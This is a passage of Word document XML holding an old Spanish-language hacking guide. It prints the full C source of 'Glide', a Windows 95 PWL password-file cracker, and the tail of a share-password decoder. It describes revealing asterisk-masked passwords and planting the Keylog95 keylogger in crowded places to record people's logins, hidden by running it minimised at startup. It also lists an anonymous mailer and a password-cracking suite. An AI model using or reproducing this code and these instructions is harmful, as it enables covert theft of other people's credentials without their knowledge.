      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve"> code += 21;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve"> blockl1++;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve"> break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ase 3:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve"> code -= 11;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve"> blockl1++;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve"> break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case 4:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve"> blockl1 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve"> switch (blockl2) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve"> case 1:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">   code = 0x2a;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">   blockl2++;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">   break;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve"> case 2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">   code = 0x0a;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">   blockl2++;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">   break;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve"> case 3:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">   code = 0xea;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">   blockl2++;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">   break;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve"> case 4:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">   code = 0x4a;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">   blockl2 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">   break;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve"> break;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break;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>i++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 (i == 256) retval = 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se *mychar = i + 32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retval;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>}    /* End of DecodeCharEight()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/* End of program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uando ejecutemos el programa nos saldra est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:\&gt;sharepw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Input the byte code in hex (ex: 76 d5 09 e3)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os pide que introduzcamos el password en formato Hexadecimal. Hay mucha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ablas por Internet para aquellos que no tengan un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g. Snadboy's revelation v1.1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este apartado hablare sobre una interesante herramienta. El Snadboy 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a tool que nos descripta los astericos de la tipica ventana que pi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ssword. Si hay una ventana con un password y que no entendemos por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lo salen asteriscos, lo que tenemos que hacer es abrir el Snadboy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tuarnos al lado de la ventana de password, la ventana del Snadboy tien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a "mira de punto", pinchamos encima de la mira y la arrastramos con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ton sobre la ventana del password situandonos encima del password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ltamos y en la ventana del Snadboy veremos el password descifr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nota, este programa para lo que hace, ocupa mucho en el disco duro,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 que puede ser un poco sospechoso o que los coders no lo han optimiza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masiado que digam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h. Keylog95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programa nos sera muy util en sitio donde halla mucha gente, ya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 un Key recoder, o sea, una peque¤a utilidad que se queda resid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memoria y graba todos los logins y password que la gente vaya metien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programa es de sencillo manejo, pero tiene que haver unos peque¤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quisitos, primero tener las librerias VBRUN300.DLL y QPRO200.DLL en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rectorio c:\windows\system y ademas tener un directorio llamado c:\win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a que es alli donde el programa grabara la informacion que obtenga, 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 fichero llamado "logx", por lo que esto quedar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:\win\logx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ndo las librerias esten metidas en el directorio System, windows crea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 icono en la carpeta de Inico, por lo que es conveniente darle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tributo de Minimizado para que nadie lo pueda ver y asi siempre que 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ranque Windows tambien lo hara el Keylog95 :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i. Glid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Glide es otro programa que sirve para desencriptar un password's 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in95. Al igual que el Sharepw solo lo tenemos que compiLar y ejecut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 la salvedad que esta escrito en C++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#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#include &lt;process.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#include &lt;ctype.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#include &lt;conio.h&gt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unsigned char huge Data[100001];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>unsigned char keystream[1001];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>int Rpoint[300]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oid main (int argc,char *argv[]) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>FILE *fd;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">int </w:t>
        <w:tab/>
        <w:t>i,j,k;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>int</w:t>
        <w:tab/>
        <w:t>size;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>char ch;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>char *name;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>int cracked;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>int sizemask;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>int maxr;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>int rsz;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>int pos;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>int Rall[300]; /* recource allocation table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if (argc&lt;2) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>printf("usage: glide filename (username)");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>exit(1)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/* read PWL file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fd=fopen(argv[1],"rb");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>if(fd==NULL) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>printf("can't open file %s",argv[1]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>exit(1)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size=0;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>while(!feof(fd)) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>Data[size++]=fgetc(fd)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size--;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>fclose(fd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/* find username */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>name=argv[1];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>if(argc&gt;2) name=argv[2];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>printf("Username: %s\n",name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/* copy encrypted text into keystream */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>cracked=size-0x0208;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>if(cracked&lt;0) cracked=0;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>if(cracked&gt;1000) cracked=1000;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>memcpy(keystream,Data+0x208,cracked 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/* generate 20 bytes of keystream */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>for(i=0;i&lt;20;i++) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>ch=toupper(name[i]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>if(ch==0) break;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>if(ch=='.') break;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>keystream[i]^=ch;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>cracked=20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/* find allocated recources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sizemask=keystream[0]+(keystream[1]&lt;&lt;8);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>printf("Sizemask: %04X\n",sizemask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for(i=0;i&lt;256;i++) Rall[i]=0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maxr=0;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>for(i=0x108;i&lt;0x208;i++) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>if(Data[i]!=0xff) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Rall[Data[i]]++;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>if (Data[i]&gt;maxr) maxr=Data[i];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>}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maxr=(((maxr/16)+1)*16);      /* recource pointer table size appear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/>
        <w:t>to be divisable by 16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/* search after recources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Rpoint[0]=0x0208+2*maxr+20+2;</w:t>
        <w:tab/>
        <w:t>/* first recource */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>for(i=0;i&lt;maxr;i++) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>/* find size of current recource */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>pos=Rpoint[i];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>rsz=Data[pos]+(Data[pos+1]&lt;&lt;8);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>rsz^=sizemask;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>printf("Analyzing block with size: %04x\t(%d:%d)\n",rsz,i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,Rall[i]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>if( (Rall[i]==0) &amp;&amp; (rsz!=0) ) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>printf("unused resource has nonzero size !!!\n");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>printf("If last line produced any : You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>may try to recover\n");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>printf("press y to attempt recovery\n");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>ch=getch();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>if(ch!='y') exit(0);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>rsz=2;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>i-=1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab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ab/>
        <w:t>pos+=rsz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ab/>
        <w:t>/* Resources have a tendency to have the wrong size for</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>some reason */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>/* check for correct size */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ab/>
        <w:t>if(i&lt;maxr-1) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>while(Data[pos+3]!=keystream[1]) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>printf(":",Data[pos+3]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>pos+=2; /* very rude may fail */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab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ab/>
        <w:t>pos+=2;</w:t>
        <w:tab/>
        <w:t>/* include pointer in size */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>Rpoint[i+1]=pos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Rpoint[maxr]=size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/* insert Table data into keystream */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>for(i=0;i &lt;= maxr;i++) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>keystream[20+2*i]^=Rpoint[i] &amp; 0x00ff;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:t>keystream[21+2*i]^=(Rpoint[i] &gt;&gt; 8) &amp; 0x00ff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cracked+=maxr*2+2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printf("%d bytes of keystream recovered\n",cracked)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ab/>
        <w:t>/* decrypt resources */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>for(i=0;i &lt; maxr;i++) {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rsz=Rpoint[i+1]-Rpoint[i];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if (rsz&gt;cracked) rsz=cracked;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printf("Recource[%d] (%d)\n",i,rsz);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for(j=0;j&lt;rsz;j++) printf("%c",Data[Rpoint[i]+j]^keystream[j]);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printf("\n");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>exit(0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uando lo ejecutemos nos saldra lo siguiente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:\&gt;glide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usage: glide filename (username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Pidiendo el fichero y el logi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j. Win95 anonymail v 1.0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sencillo programa nos sera de gran ayuda para enviar mail anonimo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ndo ejecutemos el programa nos saldra una ventana con los siguient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ampo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os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rom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bjec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lo tenemos que rellenarlos correctamente y pulsar el "send" para envi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mail anonimo y cuando hayamos acabado pulsar "quit"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 programa muy sencillo que nos puede ser util. Como nota, el autor n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vierte que nadie le envie mail anonimo con su programa, por lo que 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ede deducir que es un farol o que el programa no es tan anonimo,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 que el autor le habra metido un troyan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k. Hacker's Utility, V 1.02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magnifico programa es una suite para Hackers. Para que nos entendamos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programa esta compuesto por muchos otros programas y asi dispon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un paquete perfecto para un Hacke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ndo ejecutamos este programa nos aparecera una ventana con un menu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rriba, y cuando abramos una de estas opciones se abrira otra ventan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 mas opciones. Ahora podemos ver el menu principal compuesto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s submenus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ile -&gt; HU setup, exi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Cracking -&gt; crack passwords -&gt; crack zip password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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>crack passwd fil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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>passwd jackpot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
